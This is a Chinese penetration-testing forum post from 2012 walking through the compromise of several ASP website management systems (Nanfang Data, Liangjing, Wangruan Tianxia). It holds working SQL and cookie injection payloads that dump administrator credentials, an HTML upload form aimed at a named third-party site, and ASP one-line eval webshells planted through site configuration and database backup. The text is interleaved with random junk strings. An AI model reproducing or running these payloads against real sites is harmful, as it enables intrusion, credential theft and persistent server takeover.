中国网络渗透测试联盟
标题:
南方数据网站管理系统注入漏洞&后台拿WebShell
[打印本页]
作者:
admin
时间:
2012-12-4 11:06
标题:
南方数据网站管理系统注入漏洞&后台拿WebShell
/Databases/0791idc.mdb
" ?: K% k3 U0 p p/ L5 r
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
" v, C. u) C* J* J# c" A# k6 a9 }
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
# e) _# k4 R* |7 u8 h
直接暴管理员帐号密码(md5)
6 _. y/ C# L: _/ I. N, U1 A
2.登陆后台
8 |2 |* T/ U& V
3.利用编辑器上传:
, P! F# V# e1 Q! {0 I& @
访问admin/southidceditor/admin_style.asp
5 i* N5 g& [( ?+ E: C; a
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
* k$ J* r* _- U- f% |" I) x
" b7 v) [& s" T; H- K4 R* c! i" p
========================================
" V1 b. L, Y% {2 R
& z+ P: O( f* _! }; _! }
参考资料整理:
, ~5 A8 I |3 Q6 m6 O( I
南方数据、良精系统、网软天下漏洞利用
+ ~- {0 r r. X+ x8 `% H2 \
$ k* ~" E9 H- C% M" u
1、通过upfile_other.asp漏洞文件直接取SHELL
6 r6 J& y* X; v4 G% r
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
2 c7 |+ N! l4 ]: r4 c0 d/ m# P
<HTML><HEAD>
* o' ^: ?+ ] s6 x4 T6 ?& `
<META http-equiv=Content-Type content="text/html; charset=gb2312">
$ @) s8 r: A( t6 @. G3 d+ }5 _
<STYLE type=text/css>BODY {
. m# O# s. f. n7 ]
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
, I2 _1 I H% w3 Y+ F* I
}
% v4 s& i- G& S+ l' z- W
.tx1 {
" l" N3 Y' J* c
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
/ I' ^/ z% L) f0 X
}
) _& b5 c5 a7 E1 K% U w4 }
</STYLE>
% w' W/ \* A( K
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
, U" C1 L3 `% c. t+ `
<BODY leftMargin=0 topMargin=0>
, e( a2 v1 p9 R5 s# U
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post
( H+ }+ W% m0 u
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
R, L2 Z0 a' \% ^) E# I6 r
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
8 S( ?/ ]3 U) e' e3 l3 M
3 Y. Z3 r ^# z& w2 t& F/ y
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
1 l* ?" g7 I+ B: |+ }( G* O
注:此方法通杀南方数据、良精系统、网软天下等
! X, `7 Z( \2 |5 {3 B4 Z' x
m& Q# ]. {/ V1 p' [2 s9 P
2、通过注入秒杀管理员帐号密码,使用如下:
& b. m% w4 W4 q
http://www.huobaodidai.cn/NewsType.asp?SmallClass=
’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
7 N. a1 o6 E% ? E: |. u0 J
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
' y, [% R) K2 z) ^( C
在网站配置[
http://www.target.com/admin/SiteConfig.asp
]的版权信息里写入 "%><%eval(request(chr(35)))%><%’
. `3 z9 _( v+ b" X- k
成功把shell写入
http://www.target.com/inc/config.asp
2 _ N) C: H# K4 |6 ?2 S
这里一句话chr(32)密码是“#”
. T+ }3 A1 r; d& E' I
3、cookie注入
, \& s' a: \0 m$ ~
清空地址栏,利用union语句来注入,提交:
: A! t% f2 _. N, b, w i0 e
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
1 V/ `, c8 A9 Z* B9 b4 T
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
1 Y$ E& i9 {2 h" @$ l5 F
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
2 ~' A1 }9 u$ ^ Z& u
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
% i* `0 W/ L* d# e1 g
( Z+ z) H% d7 N, T' ~0 V/ c6 S2 s$ o+ D
三、后台取SHELL方法总结
! v* x' o& F7 d$ u
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
% E( Q& W! k1 L
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
) B4 C1 d/ J+ Q$ q- Y" c1 j
这时再打开一句话马的客户端,提交同样得到一个小马
6 r# R/ j. V* j) K3 j( n
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
) K& d7 h8 B4 y' b+ T; ?
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
6 E6 c& S3 ^% r8 f/ E" {0 v$ m! t8 C
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
" C7 F( M* p8 \7 q9 L; k
EnableUpload=false
( R3 F0 \0 i: p" V1 L
* O# m' X0 d3 ^2 Y
end if
+ L/ d8 U$ Z( \/ W
if EnableUpload=false then
9 f. V$ F$ Q& y6 t7 L
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
0 S I, A' M# w
FoundErr=true
- K# u% _; P: i8 a/ Q7 r6 \! U
end if
, ]6 o: Q/ ~+ h! e; F
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
3 u& b) e. d3 r8 j
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
9 }% G3 n) k! O0 y6 z8 }0 N4 Z9 k
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
8 ^3 f/ d4 M, F: b- r2 ^3 ?' L. s0 l, n' a
8 Y0 B: i" k+ u$ @' E
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
. _: W8 {- ]& g+ `" b& X+ Z; z$ E
直接访问备份后的地址,就得到一个webshell
, A8 L7 Z5 R) S4 d
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2